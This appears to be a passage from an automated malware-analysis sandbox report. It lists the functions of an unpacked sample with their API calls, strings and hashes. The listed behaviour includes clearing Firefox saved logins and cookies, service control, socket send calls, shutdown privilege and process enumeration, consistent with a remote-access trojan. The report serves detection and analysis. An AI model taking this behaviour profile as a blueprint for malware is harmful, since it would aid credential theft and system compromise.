                                          • Instruction Fuzzy Hash: E591D671F00208ABCB05BB659D4696F3A69EB44304B10407FF905B72E2EBF84D05DB5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040A012, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A091
                                          • FindClose.KERNEL32(00000000), ref: 0040A0AB
                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040A1E2
                                          • FindClose.KERNEL32(00000000), ref: 0040A208
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Find$CloseFile$FirstNext
                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                          • API String ID: 1164774033-3681987949
                                          • Opcode ID: 7211f678bce55bba0cd1d63af98ad6c2c4189c5a55d84edd23214396f15f50ab
                                          • Instruction ID: f2c277aebdcb09342038ebf6bf1e841689b7d3b7dff34d34010c96f776921475
                                          • Opcode Fuzzy Hash: 7211f678bce55bba0cd1d63af98ad6c2c4189c5a55d84edd23214396f15f50ab
                                          • Instruction Fuzzy Hash: B451943091025A5BCB14FB71DD569EEB774AF11305F4001BFF806B60E2EF785A89CA5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040A22D, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A2A5
                                          • FindClose.KERNEL32(00000000), ref: 0040A2BB
                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040A2E5
                                          • DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A38D
                                          • GetLastError.KERNEL32 ref: 0040A397
                                          • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A3AB
                                          • FindClose.KERNEL32(00000000), ref: 0040A3D1
                                          • FindClose.KERNEL32(00000000), ref: 0040A3F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                          • API String ID: 532992503-432212279
                                          • Opcode ID: a869c801c1e13f68448cdbd77196949946ba1128e16313e5d789613cf0112277
                                          • Instruction ID: 2e8bce256a7dd72f22d157e061cccd6386a79eba79b63e076e2be11f32c05444
                                          • Opcode Fuzzy Hash: a869c801c1e13f68448cdbd77196949946ba1128e16313e5d789613cf0112277
                                          • Instruction Fuzzy Hash: 5441B2309003195BCB14FBA5DC569EE7778AF11305F40017FF806B61D2EF385A99CA9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004160DB, Relevance: 15.2, APIs: 10, Instructions: 226serviceCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,0046BACC,0046C998), ref: 004160F2
                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,00415BDC,?), ref: 00416139
                                          • GetLastError.KERNEL32(?,0046BACC,0046C998), ref: 00416147
                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,00415BDC,?), ref: 00416178
                                          • OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,004659C4,00000000,004659C4,00000000,004659C4,?,0046BACC,0046C998), ref: 00416248
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: EnumOpenServicesStatus$ErrorLastManagerService
                                          • String ID:
                                          • API String ID: 2247270020-0
                                          • Opcode ID: 3a0335570ce1dd26f858331b256eec3d42cee765c1be6f22b815ec7b4d0d11c2
                                          • Instruction ID: 68473e94775990671fd8c6040cdbc231cd1f0957a3a8cd51887978b0f5e9c903
                                          • Opcode Fuzzy Hash: 3a0335570ce1dd26f858331b256eec3d42cee765c1be6f22b815ec7b4d0d11c2
                                          • Instruction Fuzzy Hash: 7B814D71D00209AACB14EBA1DC929EEB739EF14345F10406EF916761D2EF386A09CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00417754, Relevance: 13.6, APIs: 9, Instructions: 147fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,?,0046C518,00000001), ref: 004177EB
                                          • FindNextFileW.KERNEL32(00000000,?,?,0046C518,00000001), ref: 00417822
                                          • RemoveDirectoryW.KERNEL32(?,?,0046C518,00000001), ref: 0041789C
                                          • FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 004178CA
                                          • RemoveDirectoryW.KERNEL32(0046C518,?,0046C518,00000001), ref: 004178D3
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,0046C518,00000001), ref: 004178F0
                                          • DeleteFileW.KERNEL32(?,?,0046C518,00000001), ref: 004178FD
                                          • GetLastError.KERNEL32(?,0046C518,00000001), ref: 00417925
                                          • FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 00417938
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                          • String ID:
                                          • API String ID: 2341273852-0
                                          • Opcode ID: a2017bcb7b032fc72568f7b298dad3f7503c270b7714985d0920de0a3b4697ef
                                          • Instruction ID: 6da704504b35dc0d8a2ea9a1e9b01ebd60215a2eebb254005b65f5ca46bb9893
                                          • Opcode Fuzzy Hash: a2017bcb7b032fc72568f7b298dad3f7503c270b7714985d0920de0a3b4697ef
                                          • Instruction Fuzzy Hash: 8051273450421A8ACF24EF78C8886FAB774FF54305F5041EAE84993251FB359ECACB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004163AD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42serviceCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00416033,00000000), ref: 004163B9
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00416033,00000000), ref: 004163CD
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163DA
                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00416033,00000000), ref: 004163E5
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163F7
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163FA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                          • String ID: 3`A
                                          • API String ID: 276877138-3175782522
                                          • Opcode ID: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
                                          • Instruction ID: 62d5a2aa0acc4a9a23ffe864dccd2203370fbef9b686cd9ab08c2db04e146924
                                          • Opcode Fuzzy Hash: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
                                          • Instruction Fuzzy Hash: 18F090311413187FD2116F659C88DBF3B6CDA41BE6B00002AF80592192CE68CE85A5B9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00411205, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 479registrylibraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112DA
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112E6
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004115C7
                                          • GetProcAddress.KERNEL32(00000000), ref: 004115CE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                          • API String ID: 2127411465-314212984
                                          • Opcode ID: 1a88d3fd99e274eabcc1c03e38d22ca0b4a7199f0b75f731fd90d8c07347ad56
                                          • Instruction ID: 42533e532c22dbc36938cc4a5415c4332dc933708f84597f9d810698dd7565cc
                                          • Opcode Fuzzy Hash: 1a88d3fd99e274eabcc1c03e38d22ca0b4a7199f0b75f731fd90d8c07347ad56
                                          • Instruction Fuzzy Hash: B4E1D171A043005BCA14B7B6CC5B9BF76A95B95708F40052FFA42B71F3EE7C8948869A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413958, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00413965
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0041396C
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041397E
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041399D
                                          • GetLastError.KERNEL32 ref: 004139A3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 3534403312-3733053543
                                          • Opcode ID: 94602a98415b27b9a6c2aabf7476c335bfb2bc105e34b2d46e9cbd2c65603840
                                          • Instruction ID: fcc62124dca6382e8ff7f462a1d037d759b9923c43a5f98482535144c24e2b82
                                          • Opcode Fuzzy Hash: 94602a98415b27b9a6c2aabf7476c335bfb2bc105e34b2d46e9cbd2c65603840
                                          • Instruction Fuzzy Hash: 44F03A71902229ABDB10AFA0ED0DAEFBF7CEF05652F100064B805A1056E6348B14CAB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044D3FA, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: __floor_pentium4
                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                          • API String ID: 4168288129-2761157908
                                          • Opcode ID: 42261130ad1b2c87b12dda9ae586fc566389ec3ff41f756cf8e7a1c957aab040
                                          • Instruction ID: bf911c1a37dbfafd62c1db5ad45da0714cb81aa7e36eaf23024dd27f54a8ec40
                                          • Opcode Fuzzy Hash: 42261130ad1b2c87b12dda9ae586fc566389ec3ff41f756cf8e7a1c957aab040
                                          • Instruction Fuzzy Hash: D2C24872E086288FEB25CE299D407EAB7B5FB44305F1541EBD80DE7240E778AE818F45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004077EC, Relevance: 9.3, APIs: 6, Instructions: 324fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004077F1
                                            • Part of subcall function 00404A08: connect.WS2_32(?,?,00000010), ref: 00404A23
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040789E
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 004078FC
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00407954
                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040796B
                                            • Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11
                                          • FindClose.KERNEL32(00000000), ref: 00407BA9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
                                          • String ID:
                                          • API String ID: 2104358809-0
                                          • Opcode ID: 6e1c50ec99e47cdf401a26aa3eae8f72bc235e77bfa98b3cfde53def79053942
                                          • Instruction ID: c2b305b608749dbe3c980790889d4cdccc335bbb97c8ab2c1357a9fa12a4aca1
                                          • Opcode Fuzzy Hash: 6e1c50ec99e47cdf401a26aa3eae8f72bc235e77bfa98b3cfde53def79053942
                                          • Instruction Fuzzy Hash: DAC170729041099ADB14FB61CD52AEE7375AF10318F10417FE906B71D2EF386B49CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044A6BC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044A9DB,?,00000000), ref: 0044A755
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044A9DB,?,00000000), ref: 0044A77E
                                          • GetACP.KERNEL32(?,?,0044A9DB,?,00000000), ref: 0044A793
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          • Opcode ID: eca72fe68e61a17013779279ff44b1afc3dcda18dc1819e1e1cc02f4b6913e30
                                          • Instruction ID: 46499b20fc6e19d8fdaaf79e5441ca5821e5cfb246ab753f5a47199e6154391f
                                          • Opcode Fuzzy Hash: eca72fe68e61a17013779279ff44b1afc3dcda18dc1819e1e1cc02f4b6913e30
                                          • Instruction Fuzzy Hash: 3C21F876680200A6F730CF64C901B9773BAEF54F65B568427E80AC7312E73ADD61C39A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044A890, Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044A99C
                                          • IsValidCodePage.KERNEL32(00000000), ref: 0044A9F7
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0044AA06
                                          • GetLocaleInfoW.KERNEL32(?,00001001,0043E2C1,00000040,?,0043E3E1,00000055,00000000,?,?,00000055,00000000), ref: 0044AA4E
                                          • GetLocaleInfoW.KERNEL32(?,00001002,0043E341,00000040), ref: 0044AA6D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                          • String ID:
                                          • API String ID: 745075371-0
                                          • Opcode ID: ee551fdf1c3de97742cd8df79b3566f25b0096286ea1fed63c8c741eae7e60fe
                                          • Instruction ID: 9b105efebd2c88567e68d059c0bbbfc36751d73e0e30cf1546c616c965cf3a16
                                          • Opcode Fuzzy Hash: ee551fdf1c3de97742cd8df79b3566f25b0096286ea1fed63c8c741eae7e60fe
                                          • Instruction Fuzzy Hash: CC5181B1940205ABFB10DFA5CC45ABF73B8BF08701F15486BE900E7291D7789914CB6A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D211, Relevance: 6.1, APIs: 4, Instructions: 127processCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00417614: GetCurrentProcess.KERNEL32(?,?,?,004180D1,WinDir,00000000,00000000), ref: 00417625
                                            • Part of subcall function 00417614: IsWow64Process.KERNEL32(00000000,?,?,004180D1,WinDir,00000000,00000000), ref: 0041762C
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0040D231
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040D253
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D3DA
                                          • CloseHandle.KERNEL32(00000000), ref: 0040D3E9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
                                          • String ID:
                                          • API String ID: 715332099-0
                                          • Opcode ID: 7e8eb5756563c21674be2b42cde96e66368aaa04c1e238b3ed61a6e384962dca
                                          • Instruction ID: 43f38b1539949543322e8b732d0e6a0d6251ec8b58a184f5b0d342f80c8325cc
                                          • Opcode Fuzzy Hash: 7e8eb5756563c21674be2b42cde96e66368aaa04c1e238b3ed61a6e384962dca
                                          • Instruction Fuzzy Hash: CD415D319142198BCB15FB66DC51AEEB375AF50304F1001BEB40AB61E2EF786F89DE58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044A343, Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A397
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A3E8
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A4A8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                          • String ID:
                                          • API String ID: 2829624132-0
                                          • Opcode ID: b14c01951aef5a3ce9e700fe29605e893b340df90a5e0dffce6f4a8b69f02f7e
                                          • Instruction ID: b8f74ff5e519f84a9dadc1d099471af389f48447beb5eaa2b6f47629cec96164
                                          • Opcode Fuzzy Hash: b14c01951aef5a3ce9e700fe29605e893b340df90a5e0dffce6f4a8b69f02f7e
                                          • Instruction Fuzzy Hash: 8061C275980207ABFB289F25CD86B7A77A8EF04304F10807BE905C6681E77CDD61CB5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00436793, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 0043688B
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00436895
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 004368A2
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 07253ee0852a9f33764ca5d3af73c4e3b9e3190da062120a25caf8a432b7ba1b
                                          • Instruction ID: 5d9ea4708ef0fa84a544dc6c90c967fa764ee4a1b9fa1f4ccea9e64d0f0b82c3
                                          • Opcode Fuzzy Hash: 07253ee0852a9f33764ca5d3af73c4e3b9e3190da062120a25caf8a432b7ba1b
                                          • Instruction Fuzzy Hash: 5B31D47490122DABCB21DF64DC8978DBBB8BF08351F5041EAE80CA7251EB749F858F49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004423BA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043DD1F,?,00000004), ref: 0044240D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: GetLocaleInfoEx
                                          • API String ID: 2299586839-2904428671
                                          • Opcode ID: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
                                          • Instruction ID: 96fabd543f80631915bdd4e6a3d78e1bd42830cecee988cc8e1c6fddece1edfb
                                          • Opcode Fuzzy Hash: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
                                          • Instruction Fuzzy Hash: 89F0F631640318BBDB11AF61DC02F6E7F65EF04B02F50402AFC0567292CA799E259A9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004153F5, Relevance: 3.2, APIs: 2, Instructions: 245fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 0041564B
                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00415717
                                            • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                                            • Part of subcall function 004179DC: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: File$Find$CreateFirstNextchar_traits
                                          • String ID:
                                          • API String ID: 3100282071-0
                                          • Opcode ID: f6406bf69a639870cb7ed549c25a6e51ffe7d1f05012d5fe626152e7071842e5
                                          • Instruction ID: fc299df16d418c96fbb3dc7ae8f09247cd9b87a8735511f9070920f35661dee3
                                          • Opcode Fuzzy Hash: f6406bf69a639870cb7ed549c25a6e51ffe7d1f05012d5fe626152e7071842e5
                                          • Instruction Fuzzy Hash: DB81A6311183409BC314F722C856EEF73A9AF91348F40453FF596671E2EF389A49CA9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004061C3, Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,?,0046C238), ref: 004061DE
                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 0040629E
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$FirstNextsend
                                          • String ID:
                                          • API String ID: 4113138495-0
                                          • Opcode ID: 29815acca4aebacfe9e3fd440fb7b39bca5b157ce94ab5209849513e5f1e04ad
                                          • Instruction ID: 05b06413529d47d56342622e5ae20bd3e82c8e6dc30fd3fa753989dbabbba416
                                          • Opcode Fuzzy Hash: 29815acca4aebacfe9e3fd440fb7b39bca5b157ce94ab5209849513e5f1e04ad
                                          • Instruction Fuzzy Hash: 442198319102099ACB14FBA6CC96DEF7778AF55304F40017FF906761D2EF385A49CA99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0042E6D5, Relevance: 3.0, Strings: 2, Instructions: 504COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 0$>B
                                          • API String ID: 0-1048847329
                                          • Opcode ID: d377f04f12ce0f7edea2aff32589f2edccf1a6c013219f9a5b1e8afcee6b3214
                                          • Instruction ID: 01373311d30a08af49cfafd2a3fc4a279ee9ec8541b77b64949e3053e491237c
                                          • Opcode Fuzzy Hash: d377f04f12ce0f7edea2aff32589f2edccf1a6c013219f9a5b1e8afcee6b3214
                                          • Instruction Fuzzy Hash: 00127332F002289BDF04DFA6D952AEDB3F2BF88314F65806AD505BB381DA756D419F84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044B5AB, Relevance: 1.8, APIs: 1, Instructions: 269COMMON
                                          Download Yara Rule
                                          APIs
                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0044B5A6,?,?,00000008,?,?,0044FE0D,00000000), ref: 0044B7D8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionRaise
                                          • String ID:
                                          • API String ID: 3997070919-0
                                          • Opcode ID: cc85bae79cd5d03614b0cb5780008f5f07eaef1f5bffa362621243dd81b96db8
                                          • Instruction ID: 9f9410494d300a06119f87cf65079ac9d7e92874d2322b7088893299dd62e991
                                          • Opcode Fuzzy Hash: cc85bae79cd5d03614b0cb5780008f5f07eaef1f5bffa362621243dd81b96db8
                                          • Instruction Fuzzy Hash: E1B16E31510608DFE719CF28C486B657BE0FF45364F29865AE899CF3A1C739E992CB84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004223C0, Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: L/B
                                          • API String ID: 0-202356071
                                          • Opcode ID: 76de492c9c07f0eb7c158ab6622f4411f8f17a6eccbc349bd2954d67055dc0a1
                                          • Instruction ID: af44c839d919a06cb4036c0461bacdbed32545edb78db0b7c7cb8e0092a3767b
                                          • Opcode Fuzzy Hash: 76de492c9c07f0eb7c158ab6622f4411f8f17a6eccbc349bd2954d67055dc0a1
                                          • Instruction Fuzzy Hash: 12E1B330A10028AFCB08CF5DE9A287E73F1FB49301755416EE582E7391DA74FA12EB95
